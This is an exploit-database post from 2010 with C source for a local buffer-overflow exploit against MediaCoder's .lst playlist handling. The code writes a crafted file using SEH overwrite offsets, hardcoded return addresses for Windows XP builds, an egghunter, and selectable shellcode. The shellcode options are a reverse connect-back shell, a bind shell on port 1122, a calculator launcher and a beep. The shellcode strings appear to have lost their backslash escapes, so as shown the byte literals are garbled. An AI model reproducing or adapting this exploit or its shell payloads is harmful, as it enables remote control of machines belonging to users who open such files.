MediaCoder (.lst) file local Buffer Overflow Exploit
Posted on 18 March 2010
==================================================== MediaCoder (.lst) file local Buffer Overflow Exploit ==================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I'm fl0 fl0w member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered By: fl0 fl0w #include<stdio.h> #include<getopt.h> #include<string.h> #include<windows.h> #define PAUSE() getchar() #define R return #define V void #define CONST const #define STATIC static #define SIZE(a) strlen(a) #define FOR(i,a,b) for(i=a;i<b;++i) #define IFeq(a,b) if(a==b) #define IFless(a,b) if(a<b) #define IFgreat(a,b) if(a>b) #define IFnot(a) if(!a) #define fisier FILE #define nul NULL #define SPLIT(a) exit(a) #define VER "0.7.3 build 4612 PSP edition" #define POCNAME "MediaCoder .lst file local buffer overflow exploit" #define AUTHOR "fl0 fl0w" #define IFn(a,b) if(a!=b) #define String_lengh 0x2FC #define EIP_OFFSET 0x300 #define NOP_OFFSET 0x304 #define EGGHUNTER_OFFSET 0x318 #define JUNK_OFFSET 0x34A #define TAG_OFFSET 0x81C #define SHELL_OFFSET 0x824 #define NSEH_OFFSET 0x2FC #define STOP break #define NOP "x90x90x90x90x90" "x90x90x90x90x90" "x90x90x90x90x90" "x90x90x90x90x90" typedef char i8; typedef short i16; typedef int i32; enum {True=1,False=0,Error=-1}; size_t len(const i8*); i32 fwt(CONST V*,i32,i32,fisier*); i32 mcpy(V*,CONST V*,i32); i32 mset(V*,i32,i32); i32 prinf(fisier*,CONST i8*,i8*); i32 strcp(CONST i8*,CONST i8*); V print(i8*); DWORD getFsize(fisier*,i8*); V gen_random(i8*,CONST i32); DWORD SearchStream(CONST i8*,size_t,CONST i8*,size_t); DWORD Findpopopret(V); i32 stncmp(CONST i8*,CONST i8*,i32); V help(); i32 closef(fisier*); fisier* openf(CONST i8*,CONST i8*,fisier*); char BeeP[]={ "x55x89xE5x83xECx18xC7x45xFC" "x6Fx7Ax83x7C" "xC7x44x24x04xD0x07x00x00xC7x04x24" "x01x0Ex00x00x8Bx45xFCxFFxD0xC9xC3" }; char ConnectBack[]={ /*ConnectBack 127.0.0.1 port 2010*/ "x31xc9xbdxcbxe3xbfxf7xb1x4fxd9xc8xd9x74x24xf4" "x5fx31x6fx10x83xc7x04x03x6fx0cx29x16x43x1fx24" "xd9xbcxe0x56x53x59xd1x44x07x29x40x58x43x7fx69" "x13x01x94xfax51x8ex9bx4bxdfxe8x92x4cxeex34x78" "x8ex71xc9x83xc3x51xf0x4bx16x90x35xb1xd9xc0xee" "xbdx48xf4x9bx80x50xf5x4bx8fxe9x8dxeex50x9dx27" "xf0x80x0ex3cxbax38x24x1ax1bx38xe9x79x67x73x86" "x49x13x82x4ex80xdcxb4xaex4exe3x78x23x8fx23xbe" "xdcxfax5fxbcx61xfcx9bxbexbdx89x39x18x35x29x9a" "x98x9axafx69x96x57xa4x36xbbx66x69x4dxc7xe3x8c" "x82x41xb7xaax06x09x63xd3x1fxf7xc2xecx40x5fxba" "x48x0ax72xafxeax51x1bx1cxc0x69xdbx0ax53x19xe9" "x95xcfxb5x41x5dxc9x42xa5x74xadxddx58x77xcdxf4" "x9ex23x9dx6ex36x4cx76x6fxb7x99xd8x3fx17x72x98" "xefxd7x22x70xfaxd7x1dx60x05x32x28xa7x92xc2x2b" "x27x62x55x2ex27x63x7fxa7xc1x01x6fxeex5axbex16" "xabx10x5fxd6x61xb0xfcx45xeex40x8ax75xb9x17xdb" "x48xb0xfdxf1xf3x6axe3x0bx65x54xa7xd7x56x5bx26" "x95xe3x7fx38x63xebx3bx6cx3bxbax95xdaxfdx14x54" "xb4x57xcax3ex50x21x20x81x26x2ex6dx77xc6x9fxd8" "xcexf9x10x8dxc6x82x4cx2dx28x59xd5x5dx63xc3x7c" "xf6x2ax96x3cx9bxccx4dx02xa2x4ex67xfbx51x4ex02" "xfex1exc8xffx72x0exbdxffx21x2fx94" }; char Bindport1122[]={ "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e" "x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48" "x4ex36x46x52x46x32x4bx38x45x54x4ex53x4bx38x4ex37" "x45x30x4ax57x41x30x4fx4ex4bx58x4fx54x4ax31x4bx48" "x4fx35x42x52x41x30x4bx4ex49x34x4bx38x46x43x4bx48" "x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x58x42x4c" "x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e" "x46x4fx4bx33x46x45x46x32x4ax32x45x37x45x4ex4bx48" "x4fx55x46x32x41x50x4bx4ex48x56x4bx48x4ex50x4bx44" "x4bx58x4fx45x4ex31x41x30x4bx4ex43x30x4ex32x4bx58" "x49x38x4ex36x46x52x4ex41x41x56x43x4cx41x33x4bx4d" "x46x56x4bx38x43x34x42x53x4bx38x42x44x4ex30x4bx48" "x42x47x4ex51x4dx4ax4bx58x42x34x4ax30x50x45x4ax46" "x50x38x50x44x50x30x4ex4ex42x55x4fx4fx48x4dx48x56" "x43x55x48x36x4ax36x43x33x44x33x4ax46x47x57x43x57" "x44x43x4fx45x46x35x4fx4fx42x4dx4ax46x4bx4cx4dx4e" "x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx55x49x58x45x4e" "x48x46x41x38x4dx4ex4ax50x44x50x45x35x4cx56x44x30" "x4fx4fx42x4dx4ax36x49x4dx49x50x45x4fx4dx4ax47x55" "x4fx4fx48x4dx43x55x43x45x43x45x43x35x43x35x43x44" "x43x35x43x34x43x45x4fx4fx42x4dx48x36x4ax36x46x50" "x44x36x48x36x43x35x49x38x41x4ex45x49x4ax36x46x4a" "x4cx51x42x47x47x4cx47x45x4fx4fx48x4dx4cx46x42x31" "x41x55x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42" "x49x4ex47x45x4fx4fx48x4dx43x55x45x45x4fx4fx42x4d" "x4ax36x45x4ex49x44x48x58x49x54x47x55x4fx4fx48x4d" "x42x55x46x35x46x45x45x45x4fx4fx42x4dx43x49x4ax46" "x47x4ex49x47x48x4cx49x37x47x55x4fx4fx48x4dx45x35" "x4fx4fx42x4dx48x46x4cx46x46x46x48x36x4ax46x43x56" "x4dx36x49x38x45x4ex4cx36x42x35x49x45x49x32x4ex4c" "x49x38x47x4ex4cx56x46x34x49x58x44x4ex41x43x42x4c" "x43x4fx4cx4ax50x4fx44x44x4dx52x50x4fx44x54x4ex52" "x43x39x4dx58x4cx57x4ax53x4bx4ax4bx4ax4bx4ax4ax56" "x44x57x50x4fx43x4bx48x51x4fx4fx45x57x46x34x4fx4f" "x48x4dx4bx45x47x55x44x45x41x45x41x35x41x45x4cx56" "x41x50x41x45x41x55x45x55x41x55x4fx4fx42x4dx4ax36" "x4dx4ax49x4dx45x30x50x4cx43x45x4fx4fx48x4dx4cx36" "x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx58x47x35x4ex4f" "x43x58x46x4cx46x36x4fx4fx48x4dx44x55x4fx4fx42x4d" "x4ax56x42x4fx4cx38x46x30x4fx35x43x35x4fx4fx48x4dx4fx4fx42x4dx5a" }; i8 Calculator[]={ "xbax20xf0xfdx7fxc7x02x4cxaaxf8x77x33xC0x50x68x63x61x6Cx63" "x54x5Bx50x53xB9xC7x93xC2x77xFFxD1xEBxF7" }; i8 egghunter[]={/*IsBadReadPtr egghunter 32 bytes*/ "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8" "x66x6Cx30x77" //fl0w tag "x8BxFAxAFx75xEAxAFx75xE7xFFxE7" }; i8 tag[]={"x66x6Cx30x77" "x66x6Cx30x77" }; i32 j,i,x,custom=0,err; i8 c,shellbuffer[0x3E8],fbuffer[0xF4240],retcode[10]; DWORD ret; i32 main(i32 argc,i8** argv) { ((argc==7)||(argc==8)&&(atoi(argv[4])>0)&&(atoi(argv[6])>0)&&(atoi(argv[4])<6)||(argc==8)&&(atoi(argv[7])==4))?(err=True):(err=Error); IFeq(err,True){ ((strcp(argv[1],"-f")==0)&&(len(argv[1])==2)&&(strcp(argv[3],"-s")==0)&&(len(argv[3])==2)&&(strcp(argv[5],"-t")==0)&&(len(argv[5])==2))?(err=True):(err=Error); IFeq(err,True){ (atoi(argv[6])==1)?(mcpy(&ret,"x26x59x01x66",4)):(atoi(argv[6])==2)?(mcpy(&ret,"xB8x15xD1x72",4)):(atoi(argv[6])==3)?(mcpy(&ret,"x83x27x90x7C",4)):(atoi(argv[6])==4)?(custom=1):(custom=0); IFeq(custom,1){ if((strncmp(argv[7],"0x",(sizeof(i8)*2))==0)&&(len(argv[7])==10)){ for(j=(sizeof(char) * 8) - 1; (j >= 0);j--) { c = *(argv[1] + j + 2); ((c>=48)&&(c<=57)||(c>=65)&&(c<=70)||(c>=97)&&(c<=102))?(err=1):(err=-1); } sscanf(argv[7],"%x",&ret); } else print("syntax error 0x not found"); } } else print("syntax error ,target must be in range[1-4]"); } else { system("cls"); printf("[#]%s [#]Ver %s [#]Author %s ",POCNAME,VER,AUTHOR); help(); } switch(atoi(argv[4])){ case 1: mcpy(shellbuffer,ConnectBack,SIZE(ConnectBack)); STOP; case 2: mcpy(shellbuffer,Bindport1122,0x2C5); STOP; case 3: mcpy(shellbuffer,Calculator,0x20); STOP; case 4: mcpy(shellbuffer,BeeP,0x13); STOP; } gen_random(fbuffer,String_lengh); mcpy(fbuffer+NSEH_OFFSET,"xEBx06x90x90",4); mcpy(fbuffer+EIP_OFFSET,&ret,4); mcpy(fbuffer+NOP_OFFSET,NOP,0x14); mcpy(fbuffer+EGGHUNTER_OFFSET,egghunter,0x20); mset(fbuffer+JUNK_OFFSET,0x58,0x4D2); mcpy(fbuffer+TAG_OFFSET,tag,8); mcpy(fbuffer+SHELL_OFFSET,shellbuffer,len(shellbuffer)); fisier* f=fopen(argv[2],"wb"); fwt(fbuffer,1,0x824+len(shellbuffer),f); closef(f); PAUSE(); print("DONE!"); printf("[!]File is %d bytes",getFsize(f,argv[2])); R 0; } size_t len(CONST i8* str) { CONST i8* aux=str; R SIZE(aux); } i32 fwt(CONST V* ptr,i32 sz,i32 elem,fisier* fname) { CONST V* p=ptr; R fwrite(p,sz,elem,fname); } i32 mcpy(V* dest,CONST V* source,i32 len) { V* D=dest; CONST* S=source; len=SIZE(source); memcpy(D,S,len); R len; } i32 mset(V* ptr,i32 val,i32 len) { V* f=ptr; i32 valoare=val; memset(f,val,len); R len; } i32 prinf(fisier* str,CONST i8* format,i8* buffer) { fisier* f=str; CONST i8* fm=format; R fprintf(f,fm,buffer); } i32 strcp(CONST i8* str1,CONST i8* str2) { CONST i8* s1=str1; CONST i8* s2=str2; R strcmp(s1,s2); } i32 stncmp(CONST i8* str1,CONST i8* str2,i32 num) { CONST i8* s1=str1; CONST i8* s2=str2; R strncmp(s1,s2,num); } V print(i8* msg) { printf("[*]%s ",msg); } V gen_random(i8* s,CONST i32 len) { i32 i; STATIC CONST i8 alphanum[]= { "0123456789ABCDEFGHIJKLMNOPQRST" "UVWXYZabcdefghijklmnopqrstuvwxyz"}; FOR(i,0,len) { s[i]=alphanum[rand()%(sizeof(alphanum)-1)]; } s[len]=0; } V help() { i8 h[]= "*************************************************************************** " "* syntax: [-f<file.m3u>] [-s<shellcode>] [-t<target>] 0xFFFFFFFF * " "* -f filename * " "* -s shellcode to run [1,5] * " "* -t target [1,4] * " "* example: mediac.exe -f vuln.lst -s 2 -t 1 * " "* mediac.exe -f vuln.lst -s 4 0xFFFFFFFF * " "* Shellcode 1.ConnectBack 127.0.0.1 port 2010 * " "* 2.Bindport1122 * " "* 3.Calculator * " "* 4.BeeP * " "* Targets 1.Universal * " "* 2.Windows xp sp2 en kernel32.dll * " "* 3.Windows sp3 en ntdll.dll * " "* 4.Windows xp sp1 en * " "*************************************************************************** "; printf("%s",h);} DWORD getFsize(fisier* g,i8* gname) { DWORD s; g=fopen(gname,"rb"); IFeq(g,NULL) { print("File error at reading"); exit(0); } fseek(g,0,SEEK_END); s=ftell(g); R s;} i32 closef(fisier* stream) { fisier* f=stream; R fclose(f); } # ~ - [ [ : Inj3ct0r : ] ]
